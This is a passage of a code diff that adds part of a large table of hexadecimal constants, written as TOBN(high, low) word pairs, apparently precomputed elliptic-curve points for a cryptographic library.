+     TOBN(0xec7f7f76, 0xb13d051a), TOBN(0x08945e1e, 0xa92da585),
+     TOBN(0x55366b7d, 0x5846426f), TOBN(0xe7d09e89, 0x247d441d),
+     TOBN(0x510b404d, 0x736fbf48), TOBN(0x7fa003d0, 0xe784bd7d),
+     TOBN(0x25f7614f, 0x17fd9596), TOBN(0x49e0e0a1, 0x35cb98db),
+     TOBN(0x2c65957b, 0x2e83a76a), TOBN(0x5d40da8d, 0xcddbe0f8),
+     TOBN(0xf2b8c405, 0x050bad24), TOBN(0x8918426d, 0xc2aa4823),
+     TOBN(0x2aeab3dd, 0xa38365a7), TOBN(0x72031717, 0x7c91b690),
+     TOBN(0x8b00d699, 0x60a94120), TOBN(0x478a255d, 0xe99eaeec),
+     TOBN(0xbf656a5f, 0x6f60aafd), TOBN(0xdfd7cb75, 0x5dee77b3),
+     TOBN(0x37f68bb4, 0xa595939d), TOBN(0x03556479, 0x28740217),
+     TOBN(0x8e740e7c, 0x84ad7612), TOBN(0xd89bc843, 0x9044695f),
+     TOBN(0xf7f3da5d, 0x85a9184d), TOBN(0x562563bb, 0x9fc0b074),
+     TOBN(0x06d2e6aa, 0xf88a888e), TOBN(0x612d8643, 0x161fbe7c),
+     TOBN(0x465edba7, 0xf64085e7), TOBN(0xb230f304, 0x29aa8511),
+     TOBN(0x53388426, 0xcda2d188), TOBN(0x90885735, 0x4b666649),
+     TOBN(0x6f02ff9a, 0x652f54f6), TOBN(0x65c82294, 0x5fae2bf0),
+     TOBN(0x7816ade0, 0x62f5eee3), TOBN(0xdcdbdf43, 0xfcc56d70),
+     TOBN(0x9fb3bba3, 0x54530bb2), TOBN(0xbde3ef77, 0xcb0869ea),
+     TOBN(0x89bc9046, 0x0b431163), TOBN(0x4d03d7d2, 0xe4819a35),
+     TOBN(0x33ae4f9e, 0x43b6a782), TOBN(0x216db307, 0x9c88a686),
+     TOBN(0x91dd88e0, 0x00ffedd9), TOBN(0xb280da9f, 0x12bd4840),
+     TOBN(0x32a7cb8a, 0x1635e741), TOBN(0xfe14008a, 0x78be02a7),
+     TOBN(0x3fafb334, 0x1b7ae030), TOBN(0x7fd508e7, 0x5add0ce9),
+     TOBN(0x72c83219, 0xd607ad51), TOBN(0x0f229c0a, 0x8d40964a),
+     TOBN(0x1be2c336, 0x1c878da2), TOBN(0xe0c96742, 0xeab2ab86),
+     TOBN(0x458f8691, 0x3e538cd7), TOBN(0xa7001f6c, 0x8e08ad53),
+     TOBN(0x52b8c6e6, 0xbf5d15ff), TOBN(0x548234a4, 0x011215dd),
+     TOBN(0xff5a9d2d, 0x3d5b4045), TOBN(0xb0ffeeb6, 0x4a904190),
+     TOBN(0x55a3aca4, 0x48607f8b), TOBN(0x8cbd665c, 0x30a0672a),
+     TOBN(0x87f834e0, 0x42583068), TOBN(0x02da2aeb, 0xf3f6e683),
+     TOBN(0x6b763e5d, 0x05c12248), TOBN(0x7230378f, 0x65a8aefc),
+     TOBN(0x93bd80b5, 0x71e8e5ca), TOBN(0x53ab041c, 0xb3b62524),
+     TOBN(0x1b860513, 0x6c9c552e), TOBN(0xe84d402c, 0xd5524e66),
+     TOBN(0xa37f3573, 0xf37f5937), TOBN(0xeb0f6c7d, 0xd1e4fca5),
+     TOBN(0x2965a554, 0xac8ab0fc), TOBN(0x17fbf56c, 0x274676ac),
+     TOBN(0x2e2f6bd9, 0xacf7d720), TOBN(0x41fc8f88, 0x10224766),
+     TOBN(0x517a14b3, 0x85d53bef), TOBN(0xdae327a5, 0x7d76a7d1),
+     TOBN(0x6ad0a065, 0xc4818267), TOBN(0x33aa189b, 0x37c1bbc1),
+     TOBN(0x64970b52, 0x27392a92), TOBN(0x21699a1c, 0x2d1535ea),
+     TOBN(0xcd20779c, 0xc2d7a7fd), TOBN(0xe3186059, 0x99c83cf2),
+     TOBN(0x9b69440b, 0x72c0b8c7), TOBN(0xa81497d7, 0x7b9e0e4d),
+     TOBN(0x515d5c89, 0x1f5f82dc), TOBN(0x9a7f67d7, 0x6361079e),
+     TOBN(0xa8da81e3, 0x11a35330), TOBN(0xe44990c4, 0x4b18be1b),
+     TOBN(0xc7d5ed95, 0xaf103e59), TOBN(0xece8aba7, 0x8dac9261),
+     TOBN(0xbe82b099, 0x9394b8d3), TOBN(0x6830f09a, 0x16adfe83),
+     TOBN(0x250a29b4, 0x88172d01), TOBN(0x8b20bd65, 0xcaff9e02),
+     TOBN(0xb8a7661e, 0xe8a6329a), TOBN(0x4520304d, 0xd3fce920),
+     TOBN(0xae45da1f, 0x2b47f7ef), TOBN(0xe07f5288, 0x5bffc540),
+     TOBN(0xf7997009, 0x3464f874), TOBN(0x2244c2cd, 0xa6fa1f38),
+     TOBN(0x43c41ac1, 0x94d7d9b1), TOBN(0x5bafdd82, 0xc82e7f17),
+     TOBN(0xdf0614c1, 0x5fda0fca), TOBN(0x74b043a7, 0xa8ae37ad),
+     TOBN(0x3ba6afa1, 0x9e71734c), TOBN(0x15d5437e, 0x9c450f2e),
+     TOBN(0x4a5883fe, 0x67e242b1), TOBN(0x5143bdc2, 0x2c1953c2),
+     TOBN(0x542b8b53, 0xfc5e8920), TOBN(0x363bf9a8, 0x9a9cee08),
+     TOBN(0x02375f10, 0xc3486e08), TOBN(0x2037543b, 0x8c5e70d2),
+     TOBN(0x7109bccc, 0x625640b4), TOBN(0xcbc1051e, 0x8bc62c3b),
+     TOBN(0xf8455fed, 0x803f26ea), TOBN(0x6badceab, 0xeb372424),
+     TOBN(0xa2a9ce7c, 0x6b53f5f9), TOBN(0x64246595, 0x1b176d99),
+     TOBN(0xb1298d36, 0xb95c081b), TOBN(0x53505bb8, 0x1d9a9ee6),
+     TOBN(0x3f6f9e61, 0xf2ba70b0), TOBN(0xd07e16c9, 0x8afad453),
+     TOBN(0x9f1694bb, 0xe7eb4a6a), TOBN(0xdfebced9, 0x3cb0bc8e),
+     TOBN(0x92d3dcdc, 0x53868c8b), TOBN(0x174311a2, 0x386107a6),
+     TOBN(0x4109e07c, 0x689b4e64), TOBN(0x30e4587f, 0x2df3dcb6),
+     TOBN(0x841aea31, 0x0811b3b2), TOBN(0x6144d41d, 0x0cce43ea),
+     TOBN(0x464c4581, 0x2a9a7803), TOBN(0xd03d371f, 0x3e158930),
+     TOBN(0xc676d7f2, 0xb1f3390b), TOBN(0x9f7a1b8c, 0xa5b61272),
+     TOBN(0x4ebebfc9, 0xc2e127a9), TOBN(0x4602500c, 0x5dd997bf),
+     TOBN(0x7f09771c, 0x4711230f), TOBN(0x058eb37c, 0x020f09c1),
+     TOBN(0xab693d4b, 0xfee5e38b), TOBN(0x9289eb1f, 0x4653cbc0),
+     TOBN(0xbecf46ab, 0xd51b9cf5), TOBN(0xd2aa9c02, 0x9f0121af),
+     TOBN(0x36aaf7d2, 0xe90dc274), TOBN(0x909e4ea0, 0x48b95a3c),
+     TOBN(0xe6b70496, 0x6f32dbdb), TOBN(0x672188a0, 0x8b030b3e),
+     TOBN(0xeeffe5b3, 0xcfb617e2), TOBN(0x87e947de, 0x7c82709e),
+     TOBN(0xa44d2b39, 0x1770f5a7), TOBN(0xe4d4d791, 0x0e44eb82),
+     TOBN(0x42e69d1e, 0x3f69712a), TOBN(0xbf11c4d6, 0xac6a820e),
+     TOBN(0xb5e7f3e5, 0x42c4224c), TOBN(0xd6b4e81c, 0x449d941c),
+     TOBN(0x5d72bd16, 0x5450e878), TOBN(0x6a61e28a, 0xee25ac54),
+     TOBN(0x33272094, 0xe6f1cd95), TOBN(0x7512f30d, 0x0d18673f),
+     TOBN(0x32f7a4ca, 0x5afc1464), TOBN(0x2f095656, 0x6bbb977b),
+     TOBN(0x586f47ca, 0xa8226200), TOBN(0x02c868ad, 0x1ac07369),
+     TOBN(0x4ef2b845, 0xc613acbe), TOBN(0x43d7563e, 0x0386054c),
+     TOBN(0x54da9dc7, 0xab952578), TOBN(0xb5423df2, 0x26e84d0b),
+     TOBN(0xa8b64eeb, 0x9b872042), TOBN(0xac205782, 0x5990f6df),
+     TOBN(0x4ff696eb, 0x21f4c77a), TOBN(0x1a79c3e4, 0xaab273af),
+     TOBN(0x29bc922e, 0x9436b3f1), TOBN(0xff807ef8, 0xd6d9a27a),
+     TOBN(0x82acea3d, 0x778f22a0), TOBN(0xfb10b2e8, 0x5b5e7469),
+     TOBN(0xc0b16980, 0x2818ee7d), TOBN(0x011afff4, 0xc91c1a2f),
+     TOBN(0x95a6d126, 0xad124418), TOBN(0x31c081a5, 0xe72e295f),
+     TOBN(0x36bb283a, 0xf2f4db75), TOBN(0xd115540f, 0x7acef462),
+     TOBN(0xc7f3a8f8, 0x33f6746c), TOBN(0x21e46f65, 0xfea990ca),
+     TOBN(0x915fd5c5, 0xcaddb0a9), TOBN(0xbd41f016, 0x78614555),
+     TOBN(0x346f4434, 0x426ffb58), TOBN(0x80559436, 0x14dbc204),
+     TOBN(0xf3dd20fe, 0x5a969b7f), TOBN(0x9d59e956, 0xe899a39a),
+     TOBN(0xf1b0971c, 0x8ad4cf4b), TOBN(0x03448860, 0x2ffb8fb8),
+     TOBN(0xf071ac3c, 0x65340ba4), TOBN(0x408d0596, 0xb27fd758),
+     TOBN(0xe7c78ea4, 0x98c364b0), TOBN(0xa4aac4a5, 0x051e8ab5),
+     TOBN(0xb9e1d560, 0x485d9002), TOBN(0x9acd518a, 0x88844455),
+     TOBN(0xe4ca688f, 0xd06f56c0), TOBN(0xa48af70d, 0xdf027972),
+     TOBN(0x691f0f04, 0x5e9a609d), TOBN(0xa9dd82cd, 0xee61270e),
+     TOBN(0x8903ca63, 0xa0ef18d3), TOBN(0x9fb7ee35, 0x3d6ca3bd),
+     TOBN(0xa7b4a09c, 0xabf47d03), TOBN(0x4cdada01, 0x1c67de8e),
+     TOBN(0x52003749, 0x9355a244), TOBN(0xe77fd2b6, 0x4f2151a9),
+     TOBN(0x695d6cf6, 0x66b4efcb), TOBN(0xc5a0cacf, 0xda2cfe25),
+     TOBN(0x104efe5c, 0xef811865), TOBN(0xf52813e8, 0x9ea5cc3d),
+     TOBN(0x855683dc, 0x40b58dbc), TOBN(0x0338ecde, 0x175fcb11),
+     TOBN(0xf9a05637, 0x74921592), TOBN(0xb4f1261d, 0xb9bb9d31),
+     TOBN(0x551429b7, 0x4e9c5459), TOBN(0xbe182e6f, 0x6ea71f53),
+     TOBN(0xd3a3b07c, 0xdfc50573), TOBN(0x9ba1afda, 0x62be8d44),
+     TOBN(0x9bcfd2cb, 0x52ab65d3), TOBN(0xdf11d547, 0xa9571802),
+     TOBN(0x099403ee, 0x02a2404a), TOBN(0x497406f4, 0x21088a71),
+     TOBN(0x99479409, 0x5004ae71), TOBN(0xbdb42078, 0xa812c362),
+     TOBN(0x2b72a30f, 0xd8828442), TOBN(0x283add27, 0xfcb5ed1c),
+     TOBN(0xf7c0e200, 0x66a40015), TOBN(0x3e3be641, 0x08b295ef),
+     TOBN(0xac127dc1, 0xe038a675), TOBN(0x729deff3, 0x8c5c6320),
+     TOBN(0xb7df8fd4, 0xa90d2c53), TOBN(0x9b74b0ec, 0x681e7cd3),
+     TOBN(0x5cb5a623, 0xdab407e5), TOBN(0xcdbd3615, 0x76b340c6),
+     TOBN(0xa184415a, 0x7d28392c), TOBN(0xc184c1d8, 0xe96f7830),
+     TOBN(0xc3204f19, 0x81d3a80f), TOBN(0xfde0c841, 0xc8e02432),
+     TOBN(0x78203b3e, 0x8149e0c1), TOBN(0x5904bdbb, 0x08053a73),
+     TOBN(0x30fc1dd1, 0x101b6805), TOBN(0x43c223bc, 0x49aa6d49),
+     TOBN(0x9ed67141, 0x7a174087), TOBN(0x311469a0, 0xd5997008),
+     TOBN(0xb189b684, 0x5e43fc61), TOBN(0xf3282375, 0xe0d3ab57),
+     TOBN(0x4fa34b67, 0xb1181da8), TOBN(0x621ed0b2, 0x99ee52b8),
+     TOBN(0x9b178de1, 0xad990676), TOBN(0xd51de67b, 0x56d54065),
+     TOBN(0x2a2c27c4, 0x7538c201), TOBN(0x33856ec8, 0x38a40f5c),
+     TOBN(0x2522fc15, 0xbe6cdcde), TOBN(0x1e603f33, 0x9f0c6f89),
+     TOBN(0x7994edc3, 0x103e30a6), TOBN(0x033a00db, 0x220c853e),
+     TOBN(0xd3cfa409, 0xf7bb7fd7), TOBN(0x70f8781e, 0x462d18f6),
+     TOBN(0xbbd82980, 0x687fe295), TOBN(0x6eef4c32, 0x595669f3),
+     TOBN(0x86a9303b, 0x2f7e85c3), TOBN(0x5fce4621, 0x71988f9b),
+     TOBN(0x5b935bf6, 0xc138acb5), TOBN(0x30ea7d67, 0x25661212),
+     TOBN(0xef1eb5f4, 0xe51ab9a2), TOBN(0x0587c98a, 0xae067c78),
+     TOBN(0xb3ce1b3c, 0x77ca9ca6), TOBN(0x2a553d4d, 0x54b5f057),
+     TOBN(0xc7898236, 0x4da29ec2), TOBN(0xdbdd5d13, 0xb9c57316),
+     TOBN(0xc57d6e6b, 0x2cd80d47), TOBN(0x80b460cf, 0xfe9e7391),
+     TOBN(0x98648cab, 0xf963c31e), TOBN(0x67f9f633, 0xcc4d32fd),
+     TOBN(0x0af42a9d, 0xfdf7c687), TOBN(0x55f292a3, 0x0b015ea7),
+     TOBN(0x89e468b2, 0xcd21ab3d), TOBN(0xe504f022, 0xc393d392),
+     TOBN(0xab21e1d4, 0xa5013af9), TOBN(0xe3283f78, 0xc2c28acb),
+     TOBN(0xf38b35f6, 0x226bf99f), TOBN(0xe8354274, 0x0e291e69),
+     TOBN(0x61673a15, 0xb20c162d), TOBN(0xc101dc75, 0xb04fbdbe),
+     TOBN(0x8323b4c2, 0x255bd617), TOBN(0x6c969693, 0x6c2a9154),
+     TOBN(0xc6e65860, 0x62679387), TOBN(0x8e01db0c, 0xb8c88e23),
+     TOBN(0x33c42873, 0x893a5559), TOBN(0x7630f04b, 0x47a3e149),
+     TOBN(0xb5d80805, 0xddcf35f8), TOBN(0x582ca080, 0x77dfe732),
+     TOBN(0x2c7156e1, 0x0b1894a0), TOBN(0x92034001, 0xd81c68c0),
+     TOBN(0xed225d00, 0xc8b115b5), TOBN(0x237f9c22, 0x83b907f2),
+     TOBN(0x0ea2f32f, 0x4470e2c0), TOBN(0xb725f7c1, 0x58be4e95),
+     TOBN(0x0f1dcafa, 0xb1ae5463), TOBN(0x59ed5187, 0x1ba2fc04),
+     TOBN(0xf6e0f316, 0xd0115d4d), TOBN(0x5180b12f, 0xd3691599),
+     TOBN(0x157e32c9, 0x527f0a41), TOBN(0x7b0b081d, 0xa8e0ecc0),
+     TOBN(0x6dbaaa8a, 0xbf4f0dd0), TOBN(0x99b289c7, 0x4d252696),
+     TOBN(0x79b7755e, 0xdbf864fe), TOBN(0x6974e2b1, 0x76cad3ab),
+     TOBN(0x35dbbee2, 0x06ddd657), TOBN(0xe7cbdd11, 0x2ff3a96d),
+     TOBN(0x88381968, 0x076be758), TOBN(0x2d737e72, 0x08c91f5d),
+     TOBN(0x5f83ab62, 0x86ec3776), TOBN(0x98aa649d, 0x945fa7a1),
+     TOBN(0xf477ec37, 0x72ef0933), TOBN(0x66f52b1e, 0x098c17b1),
+     TOBN(0x9eec58fb, 0xd803738b), TOBN(0x91aaade7, 0xe4e86aa4),
+     TOBN(0x6b1ae617, 0xa5b51492), TOBN(0x63272121, 0xbbc45974),
+     TOBN(0x7e0e28f0, 0x862c5129), TOBN(0x0a8f79a9, 0x3321a4a0),
+     TOBN(0xe26d1664, 0x5041c88f), TOBN(0x0571b805, 0x53233e3a),
+     TOBN(0xd1b0ccde, 0xc9520711), TOBN(0x55a9e4ed, 0x3c8b84bf),
+     TOBN(0x9426bd39, 0xa1fef314), TOBN(0x4f5f638e, 0x6eb93f2b),
+     TOBN(0xba2a1ed3, 0x2bf9341b), TOBN(0xd63c1321, 0x4d42d5a9),
+     TOBN(0xd2964a89, 0x316dc7c5), TOBN(0xd1759606, 0xca511851),
+     TOBN(0xd8a9201f, 0xf9e6ed35), TOBN(0xb7b5ee45, 0x6736925a),
+     TOBN(0x0a83fbbc, 0x99581af7), TOBN(0x3076bc40, 0x64eeb051),
+     TOBN(0x5511c98c, 0x02dec312), TOBN(0x270de898, 0x238dcb78),
+     TOBN(0x2cf4cf9c, 0x539c08c9), TOBN(0xa70cb65e, 0x38d3b06e),
+     TOBN(0xb12ec10e, 0xcfe57bbd), TOBN(0x82c7b656, 0x35a0c2b5),
+     TOBN(0xddc7d5cd, 0x161c67bd), TOBN(0xe32e8985, 0xae3a32cc),
+     TOBN(0x7aba9444, 0xd11a5529), TOBN(0xe964ed02, 0x2427fa1a),
+     TOBN(0x1528392d, 0x24a1770a), TOBN(0xa152ce2c, 0x12c72fcd),
+     TOBN(0x714553a4, 0x8ec07649), TOBN(0x18b4c290, 0x459dd453),
+     TOBN(0xea32b714, 0x7b64b110), TOBN(0xb871bfa5, 0x2e6f07a2),
+     TOBN(0xb67112e5, 0x9e2e3c9b), TOBN(0xfbf250e5, 0x44aa90f6),
+     TOBN(0xf77aedb8, 0xbd539006), TOBN(0x3b0cdf9a, 0xd172a66f),
+     TOBN(0xedf69fea, 0xf8c51187), TOBN(0x05bb67ec, 0x741e4da7),
+     TOBN(0x47df0f32, 0x08114345), TOBN(0x56facb07, 0xbb9792b1),
+     TOBN(0xf3e007e9, 0x8f6229e4), TOBN(0x62d103f4, 0x526fba0f),
+     TOBN(0x4f33bef7, 0xb0339d79), TOBN(0x9841357b, 0xb59bfec1),
+     TOBN(0xfa8dbb59, 0xc34e6705), TOBN(0xc3c7180b, 0x7fdaa84c),
+     TOBN(0xf95872fc, 0xa4108537), TOBN(0x8750cc3b, 0x932a3e5a),
+     TOBN(0xb61cc69d, 0xb7275d7d), TOBN(0xffa0168b, 0x2e59b2e9),
+     TOBN(0xca032abc, 0x6ecbb493), TOBN(0x1d86dbd3, 0x2c9082d8),
+     TOBN(0xae1e0b67, 0xe28ef5ba), TOBN(0x2c9a4699, 0xcb18e169),
+     TOBN(0x0ecd0e33, 0x1e6bbd20), TOBN(0x571b360e, 0xaf5e81d2),
+     TOBN(0xcd9fea58, 0x101c1d45), TOBN(0x6651788e, 0x18880452),
+     TOBN(0xa9972635, 0x1f8dd446), TOBN(0x44bed022, 0xe37281d0),
+     TOBN(0x094b2b2d, 0x33da525d), TOBN(0xf193678e, 0x13144fd8),
+     TOBN(0xb8ab5ba4, 0xf4c1061d), TOBN(0x4343b5fa, 0xdccbe0f4),
+     TOBN(0xa8702371, 0x63812713), TOBN(0x47bf6d2d, 0xf7611d93),
+     TOBN(0x46729b8c, 0xbd21e1d7), TOBN(0x7484d4e0, 0xd629e77d),
+     TOBN(0x830e6eea, 0x60dbac1f), TOBN(0x23d8c484, 0xda06a2f7),
+     TOBN(0x896714b0, 0x50ca535b), TOBN(0xdc8d3644, 0xebd97a9b),
+     TOBN(0x106ef9fa, 0xb12177b4), TOBN(0xf79bf464, 0x534d5d9c),
+     TOBN(0x2537a349, 0xa6ab360b), TOBN(0xc7c54253, 0xa00c744f),
+     TOBN(0xb3c7a047, 0xe5911a76), TOBN(0x61ffa5c8, 0x647f1ee7),
+     TOBN(0x15aed36f, 0x8f56ab42), TOBN(0x6a0d41b0, 0xa3ff9ac9),
+     TOBN(0x68f469f5, 0xcc30d357), TOBN(0xbe9adf81, 0x6b72be96),
+     TOBN(0x1cd926fe, 0x903ad461), TOBN(0x7e89e38f, 0xcaca441b),
+     TOBN(0xf0f82de5, 0xfacf69d4), TOBN(0x363b7e76, 0x4775344c),
+     TOBN(0x6894f312, 0xb2e36d04), TOBN(0x3c6cb4fe, 0x11d1c9a5),
+     TOBN(0x85d9c339, 0x4008e1f2), TOBN(0x5e9a85ea, 0x249f326c),
+     TOBN(0xdc35c60a, 0x678c5e06), TOBN(0xc08b944f, 0x9f86fba9),
+     TOBN(0xde40c02c, 0x89f71f0f), TOBN(0xad8f3e31, 0xff3da3c0),
+     TOBN(0x3ea5096b, 0x42125ded), TOBN(0x13879cbf, 0xa7379183),
+     TOBN(0x6f4714a5, 0x6b306a0b), TOBN(0x359c2ea6, 0x67646c5e),
+     TOBN(0xfacf8943, 0x07726368), TOBN(0x07a58935, 0x65ff431e),
+     TOBN(0x24d661d1, 0x68754ab0), TOBN(0x801fce1d, 0x6f429a76),
+     TOBN(0xc068a85f, 0xa58ce769), TOBN(0xedc35c54, 0x5d5eca2b),
+     TOBN(0xea31276f, 0xa3f660d1), TOBN(0xa0184ebe, 0xb8fc7167),
+     TOBN(0x0f20f21a, 0x1d8db0ae), TOBN(0xd96d095f, 0x56c35e12),
+     TOBN(0xedf402b5, 0xf8c2a25b), TOBN(0x1bb772b9, 0x059204b6),
+     TOBN(0x50cbeae2, 0x19b4e34c), TOBN(0x93109d80, 0x3fa0845a),
+     TOBN(0x54f7ccf7, 0x8ef59fb5), TOBN(0x3b438fe2, 0x88070963),
+     TOBN(0x9e28c659, 0x31f3ba9b), TOBN(0x9cc31b46, 0xead9da92),
+     TOBN(0x3c2f0ba9, 0xb733aa5f), TOBN(0xdece47cb, 0xf05af235),
+     TOBN(0xf8e3f715, 0xa2ac82a5), TOBN(0xc97ba641, 0x2203f18a),
+     TOBN(0xc3af5504, 0x09c11060), TOBN(0x56ea2c05, 0x46af512d),
+     TOBN(0xfac28daf, 0xf3f28146), TOBN(0x87fab43a, 0x959ef494),}
+    ,
+    {TOBN(0x09891641, 0xd4c5105f), TOBN(0x1ae80f8e, 0x6d7fbd65),
+     TOBN(0x9d67225f, 0xbee6bdb0), TOBN(0x3b433b59, 0x7fc4d860),
+     TOBN(0x44e66db6, 0x93e85638), TOBN(0xf7b59252, 0xe3e9862f),
+     TOBN(0xdb785157, 0x665c32ec), TOBN(0x702fefd7, 0xae362f50),
+     TOBN(0x3754475d, 0x0fefb0c3), TOBN(0xd48fb56b, 0x46d7c35d),
+     TOBN(0xa070b633, 0x363798a4), TOBN(0xae89f3d2, 0x8fdb98e6),
+     TOBN(0x970b89c8, 0x6363d14c), TOBN(0x89817521, 0x67abd27d),
+     TOBN(0x9bf7d474, 0x44d5a021), TOBN(0xb3083baf, 0xcac72aee),
+     TOBN(0x389741de, 0xbe949a44), TOBN(0x638e9388, 0x546a4fa5),
+     TOBN(0x3fe6419c, 0xa0047bdc), TOBN(0x7047f648, 0xaaea57ca),
+     TOBN(0x54e48a90, 0x41fbab17), TOBN(0xda8e0b28, 0x576bdba2),
+     TOBN(0xe807eebc, 0xc72afddc), TOBN(0x07d3336d, 0xf42577bf),
+     TOBN(0x62a8c244, 0xbfe20925), TOBN(0x91c19ac3, 0x8fdce867),
+     TOBN(0x5a96a5d5, 0xdd387063), TOBN(0x61d587d4, 0x21d324f6),
+     TOBN(0xe87673a2, 0xa37173ea), TOBN(0x23848008, 0x53778b65),
+     TOBN(0x10f8441e, 0x05bab43e), TOBN(0xfa11fe12, 0x4621efbe),
+     TOBN(0x047b772e, 0x81685d7b), TOBN(0x23f27d81, 0xbf34a976),
+     TOBN(0xc27608e2, 0x915f48ef), TOBN(0x3b0b43fa, 0xa521d5c3),
+     TOBN(0x7613fb26, 0x63ca7284), TOBN(0x7f5729b4, 0x1d4db837),
+     TOBN(0x87b14898, 0x583b526b), TOBN(0x00b732a6, 0xbbadd3d1),
+     TOBN(0x8e02f426, 0x2048e396), TOBN(0x436b50b6, 0x383d9de4),
+     TOBN(0xf78d3481, 0x471e85ad), TOBN(0x8b01ea6a, 0xd005c8d6),
+     TOBN(0xd3c7afee, 0x97015c07), TOBN(0x46cdf1a9, 0x4e3ba2ae),
+     TOBN(0x7a42e501, 0x83d3a1d2), TOBN(0xd54b5268, 0xb541dff4),
+     TOBN(0x3f24cf30, 0x4e23e9bc), TOBN(0x4387f816, 0x126e3624),
+     TOBN(0x26a46a03, 0x3b0b6d61), TOBN(0xaf1bc845, 0x8b2d777c),
+     TOBN(0x25c401ba, 0x527de79c), TOBN(0x0e1346d4, 0x4261bbb6),
+     TOBN(0x4b96c44b, 0x287b4bc7), TOBN(0x658493c7, 0x5254562f),
+     TOBN(0x23f949fe, 0xb8a24a20), TOBN(0x17ebfed1, 0xf52ca53f),
+     TOBN(0x9b691bbe, 0xbcfb4853), TOBN(0x5617ff6b, 0x6278a05d),
+     TOBN(0x241b34c5, 0xe3c99ebd), TOBN(0xfc64242e, 0x1784156a),
+     TOBN(0x4206482f, 0x695d67df), TOBN(0xb967ce0e, 0xee27c011),
+     TOBN(0x65db3751, 0x21c80b5d), TOBN(0x2e7a563c, 0xa31ecca0),
+     TOBN(0xe56ffc4e, 0x5238a07e), TOBN(0x3d6c2966, 0x32ced854),
+     TOBN(0xe99d7d1a, 0xaf70b885), TOBN(0xafc3bad9, 0x2d686459),
+     TOBN(0x9c78bf46, 0x0cc8ba5b), TOBN(0x5a439519, 0x18955aa3),
+     TOBN(0xf8b517a8, 0x5fe4e314), TOBN(0xe60234d0, 0xfcb8906f),
+     TOBN(0xffe542ac, 0xf2061b23), TOBN(0x287e191f, 0x6b4cb59c),
+     TOBN(0x21857ddc, 0x09d877d8), TOBN(0x1c23478c, 0x14678941),
+     TOBN(0xbbf0c056, 0xb6e05ea4), TOBN(0x82da4b53, 0xb01594fe),
+     TOBN(0xf7526791, 0xfadb8608), TOBN(0x049e832d, 0x7b74cdf6),
+     TOBN(0xa43581cc, 0xc2b90a34), TOBN(0x73639eb8, 0x9360b10c),
+     TOBN(0x4fba331f, 0xe1e4a71b), TOBN(0x6ffd6b93, 0x8072f919),
+     TOBN(0x6e53271c, 0x65679032), TOBN(0x67206444, 0xf14272ce),
+     TOBN(0xc0f734a3, 0xb2335834), TOBN(0x9526205a, 0x90ef6860),
+     TOBN(0xcb8be717, 0x04e2bb0d), TOBN(0x2418871e, 0x02f383fa),
+     TOBN(0xd7177681, 0x4082c157), TOBN(0xcc914ad0, 0x29c20073),
+     TOBN(0xf186c1eb, 0xe587e728), TOBN(0x6fdb3c22, 0x61bcd5fd),
+     TOBN(0x30d014a6, 0xf2f9f8e9), TOBN(0x963ece23, 0x4fec49d2),
+     TOBN(0x862025c5, 0x9605a8d9), TOBN(0x39874445, 0x19f8929a),
+     TOBN(0x01b6ff65, 0x12bf476a), TOBN(0x598a64d8, 0x09cf7d91),
+     TOBN(0xd7ec7749, 0x93be56ca), TOBN(0x10899785, 0xcbb33615),
+     TOBN(0xb8a092fd, 0x02eee3ad), TOBN(0xa86b3d35, 0x30145270),
+     TOBN(0x323d98c6, 0x8512b675), TOBN(0x4b8bc785, 0x62ebb40f),
+     TOBN(0x7d301f54, 0x413f9cde), TOBN(0xa5e4fb4f, 0x2bab5664),
+     TOBN(0x1d2b252d, 0x1cbfec23), TOBN(0xfcd576bb, 0xe177120d),
+     TOBN(0x04427d3e, 0x83731a34), TOBN(0x2bb9028e, 0xed836e8e),
+     TOBN(0xb36acff8, 0xb612ca7c), TOBN(0xb88fe5ef, 0xd3d9c73a),
+     TOBN(0xbe2a6bc6, 0xedea4eb3), TOBN(0x43b93133, 0x488eec77),
+     TOBN(0xf41ff566, 0xb17106e1), TOBN(0x469e9172, 0x654efa32),
+     TOBN(0xb4480f04, 0x41c23fa3), TOBN(0xb4712eb0, 0xc1989a2e),
+     TOBN(0x3ccbba0f, 0x93a29ca7), TOBN(0x6e205c14, 0xd619428c),
+     TOBN(0x90db7957, 0xb3641686), TOBN(0x0432691d, 0x45ac8b4e),
+     TOBN(0x07a759ac, 0xf64e0350), TOBN(0x0514d89c, 0x9c972517),
+     TOBN(0x1701147f, 0xa8e67fc3), TOBN(0x9e2e0b8b, 0xab2085be),
+     TOBN(0xd5651824, 0xac284e57), TOBN(0x890d4325, 0x74893664),
+     TOBN(0x8a7c5e6e, 0xc55e68a3), TOBN(0xbf12e90b, 0x4339c85a),
+     TOBN(0x31846b85, 0xf922b655), TOBN(0x9a54ce4d, 0x0bf4d700),
+     TOBN(0xd7f4e83a, 0xf1a14295), TOBN(0x916f955c, 0xb285d4f9),
+     TOBN(0xe57bb0e0, 0x99ffdaba), TOBN(0x28a43034, 0xeab0d152),
+     TOBN(0x0a36ffa2, 0xb8a9cef8), TOBN(0x5517407e, 0xb9ec051a),
+     TOBN(0x9c796096, 0xea68e672), TOBN(0x853db5fb, 0xfb3c77fb),
+     TOBN(0x21474ba9, 0xe864a51a), TOBN(0x6c267699, 0x6e8a1b8b),
+     TOBN(0x7c823626, 0x94120a28), TOBN(0xe61e9a48, 0x8383a5db),
+     TOBN(0x7dd75003, 0x9f84216d), TOBN(0xab020d07, 0xad43cd85),
+     TOBN(0x9437ae48, 0xda12c659), TOBN(0x6449c2eb, 0xe65452ad),
+     TOBN(0xcc7c4c1c, 0x2cf9d7c1), TOBN(0x1320886a, 0xee95e5ab),
+     TOBN(0xbb7b9056, 0xbeae170c), TOBN(0xc8a5b250, 0xdbc0d662),
+     TOBN(0x4ed81432, 0xc11d2303), TOBN(0x7da66912, 0x1f03769f),
+     TOBN(0x3ac7a5fd, 0x84539828), TOBN(0x14dada94, 0x3bccdd02),
+     TOBN(0x8b84c321, 0x7ef6b0d1), TOBN(0x52a9477a, 0x7c933f22),
+     TOBN(0x5ef6728a, 0xfd440b82), TOBN(0x5c3bd859, 0x6ce4bd5e),
+     TOBN(0x918b80f5, 0xf22c2d3e), TOBN(0x368d5040, 0xb7bb6cc5),
+     TOBN(0xb66142a1, 0x2695a11c), TOBN(0x60ac583a, 0xeb19ea70),
+     TOBN(0x317cbb98, 0x0eab2437), TOBN(0x8cc08c55, 0x5e2654c8),
+     TOBN(0xfe2d6520, 0xe6d8307f), TOBN(0xe9f147f3, 0x57428993),
+     TOBN(0x5f9c7d14, 0xd2fd6cf1), TOBN(0xa3ecd064, 0x2d4fcbb0),
